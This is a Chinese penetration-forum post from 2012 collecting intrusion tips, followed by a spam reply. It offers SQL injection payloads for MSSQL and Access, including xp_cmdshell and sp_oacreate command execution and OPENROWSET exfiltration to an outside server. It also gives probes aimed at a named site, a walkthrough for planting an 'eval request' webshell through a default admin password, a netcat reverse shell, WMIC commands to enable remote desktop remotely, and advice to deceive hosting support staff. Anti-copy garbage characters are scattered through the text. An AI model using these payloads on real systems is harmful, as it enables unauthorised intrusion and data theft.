中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]

作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关
3 @" I) }7 r- w! R# r2 W; g
" O, E4 p! Z0 p3 S2 r8 a( i
; ?+ Y( v" w7 GSA点数据库分离搞法+语句:
2 [: ]) e9 K3 I+ v5 Q! V. L6 e6 Z8 |/ D, q$ j' ?% L. c3 {) G$ b
注射点不显错,执行下面三条语句页面都返回正常。
( i) u# g8 i7 a- u" w; qand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')7 _. {3 r* s' x$ G  G+ O# H6 ~
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
% E5 Z! @/ R+ ^( s; s1 Fand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
( P# N8 R, h8 q( s7 s0 ?可以列目录,判断系统为2000,web与数据库分离1 Y% h4 |8 \9 J! N7 J
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
3 ~# \' v9 S' @在注射点上执行0 ^4 E4 a: a  d+ R% ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--2 Y5 O* d: _" p4 K/ y- j5 e* Q/ O7 r
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
! z4 v9 {/ i7 u2 }还有我用NC监听得其他端口都没有得到IP。
1 O( m  |, M; R6 o
" Y$ ?7 q$ @! [# r: u通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。/ {2 D5 e* f) v# l
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--& v9 C; x5 r/ W& m6 ]

  f1 h4 K8 V) W4 y: J: z;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
1 }. C# \& n7 x/ |& N
3 J3 }  j* n% R4 B5 T6 _现在就猜想是不是数据库是内网而且不能连外网。
) _' X: L& N2 G8 L3 h
$ }) d9 @( `0 u) h( b# t/ v* O
% |; u. J$ X' ~$ H( B$ y+ Zaccess导出txt文本代码5 p' d; M' a- ?. u; S
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
' f: D. ?; _2 B+ ?$ d! T, L7 e- Q
6 ]1 S( X0 g, M- y4 u. [! m% w
0 d7 d7 J7 M$ S, J! j
自动跳转到指定网站代码头
8 X8 K% _1 s* R* m<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
  B6 T' t) p1 H% e: V) i; Y6 m: l1 g1 H

, a' p0 N$ Y. }入侵java or jsp站点时默认配置文件路径:7 }4 h- X& [: @; _, Y% ]8 x8 Q
\web-inf\web.xml7 G% A- a/ I1 p4 m4 k
tomcat下的配置文件位置:
% Q3 K* d# K4 Z. c3 W\conf\server.xml            (前面加上tomcat路径)4 t- ~7 _) t& c
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
* w! S7 _6 Q, @& m4 B, W
; {! Z- B8 p+ i3 e" y3 b* }* r2 @1 W
; M* @& z+ Y/ G+ q% _  X
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
! H) A/ S  i7 x0 w5 J-1%23
; ~7 I1 x) P( D3 D>
$ M. M# @. V. _' B<
% L$ B9 N6 A% j5 a+ M1'+or+'1'='11 D" b9 \% X/ ^$ T# n; C8 P* N
id=8%bf0 Q& H) G# ^# q( |5 J) b. |( p  P1 ~

3 Y8 h1 Y4 b1 c8 K全新注入点检测试法:
1 e( O$ c- k) D" N% `' t: x在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。4 H. T3 X& b) N# W& Y/ D; ?
5 K2 Y% @. g* g0 |7 R
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
0 Y' t4 j/ F9 _/ v
5 g, b7 t2 W9 F% |  k搜索型注入判断方法:
% t& `) Y$ V% M  A+ g北京%' and '1'='1' and '%'='# E2 {2 C7 B3 I8 u  ?, Q
北京%' and '1'='2' and '%'='
% C- d. b. f4 V" I, ~
' A* L% k) u$ ^  r& X  o  `6 a# J" @8 x- V- u9 R2 m+ T7 k
COOKIES注入:
1 c7 Z! P. R4 O, d. R7 h  v6 U7 F1 u2 B# g/ Q1 K  n
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
# d. O; g+ }6 V2 r8 E2 v) K% l; L9 ~/ q+ {# z
2000专业版查看本地登录用户命令:0 {0 n* J; h  Z7 ~" O: L, X
net config workstation
# I8 m# T& W1 s& m+ k; ]# {! G) D0 G/ ^
7 e2 A; T% G" |9 s6 m
2003下查看ipsec配置和默认防火墙配置命令:
$ i& s2 k0 Q1 i" `5 jnetsh firewall show config
1 H! l5 X- d$ W5 h2 y1 }3 l0 H9 d4 D1 t$ ynetsh ipsec static show all. `5 b1 t+ d4 w. W
$ x& ?; I- Y: M; G/ s
不指派指定策略命令:% r1 E2 p! r1 x. q7 o
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
3 c. Z3 [# N# K& h! w8 r% bnetsh ipsec static show policy all  显示策略名
5 r8 ]3 s( u5 ?1 n+ B" J; h& V- r- N- R) s+ r6 O  @0 i' ~: ]* L
1 j' o3 e; J! Q2 U2 ~
猜管理员后台小技巧:
0 z& S- f2 O* P# s7 x, d8 Uadmin/left.asp
/ w9 y$ k. M; }! d! eadmin/main.asp8 n" ~! u. T: _3 q& [
admin/top.asp# C* _& Z" _- I( ?
admin/admin.asp ; ?' ?) `# V) l. h7 R
会现出菜单导航,然后迅雷下载全部链接
3 l6 Z! {  z: G' a! T) u2 w: I( W( }0 W' j1 d

0 t* J# s( u# ?- A社会工程学:
' H( j9 w  g, d, K' G/ j3 s) O用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人$ W3 n! L* `% d/ j4 l% [; s
然后去骗客服$ f' W5 u+ ?1 \  S7 U% f- @

3 ~/ C/ [/ d# N5 E' Y. ?+ {0 H4 A5 y4 Z+ L1 d" X2 o
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: $ B4 s+ l9 U. G: X5 w. l
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 7 W. f/ ?1 w. H9 x' O" [3 ?
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。) @6 }, }% [3 q+ C: r7 n

. w; _! y9 {  _( N0 `& K- n- D% v4 }0 X; w3 C5 |5 D
7 c8 p% f  o2 z& r+ v8 y
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( G- L; w4 K1 s0 {0 {- [
0 Z1 S$ K: D, h" t
) S  o, H% x7 p
5 g- Y( z" D$ z0 ~  t  F
CMD加密注册表位置) R- f" t7 |; v) L: g0 N% e+ V
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor$ `1 U# V5 f+ T5 O, Y
AutoRun
7 B1 B2 T0 s+ {
( e* H& S3 X, V(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
: T' w( G+ r2 X! e3 RAutoRun- Z% J1 k& C1 L
" u+ }5 b. r  u5 H3 h
/ N9 a3 K2 \$ G: p8 T) e/ v+ w( u
在找注入时搜索Hidden,把他改成test$ X: Z+ q( h& \2 r. g; v0 O. h
6 t2 T2 C' d- B; L1 ^! M& o9 u$ s

. V; M. E% b5 F/ M3 s# R8 K* q9 N) U
mstsc /v:IP /console 8 p$ b5 N* h2 [+ ?6 G& R1 O; e6 x

/ e2 F; G) Q6 z  b' H
" j# x" n, A; w- e5 ]& x. |( [一句话开3389:/ U8 E" c) y2 |, O/ z3 H3 t+ Z+ R
- p* |6 N# u1 o$ P2 ~) v! S4 r
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
/ I0 V( ?4 d( v. q" O) l开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.: a, w) B/ {8 q2 @- y. E' h

5 y) ?- r; }" j# F2 w/ n# h+ f
7 w7 D" Y2 q" H* @0 y* {知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:" i% E; x/ @6 W# t- v
Insert into admin(user,pwd) values('test','test')  H/ Z" ~! L. e* m& _# M) f
1 R' i: I# z4 a- c$ O6 k1 H2 m! _8 O
5 V9 l, D' y( {5 n* j; h
NC反弹& N3 N1 \% R! a9 a, m- Y( Y0 ~/ H
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   + Q3 w' U6 \3 ~& _, n
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
+ i. _# s/ ?+ \0 J. G/ d# {# o4 R9 W, W1 ?5 a: f

* w, j& K2 I8 a在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
% z- S$ s9 K2 C/ Z& P( c+ l
, q  v2 n6 t% A( j4 {有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
  q# Q. r! X, y! n' d$ s3 i% V; A3 K例如:0 o3 W5 ^; R% X7 l; E# |! h1 G
subst k: d:\www\ 用d盘www目录替代k盘/ ~% u& ^, X8 ~7 ^) ?
subst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2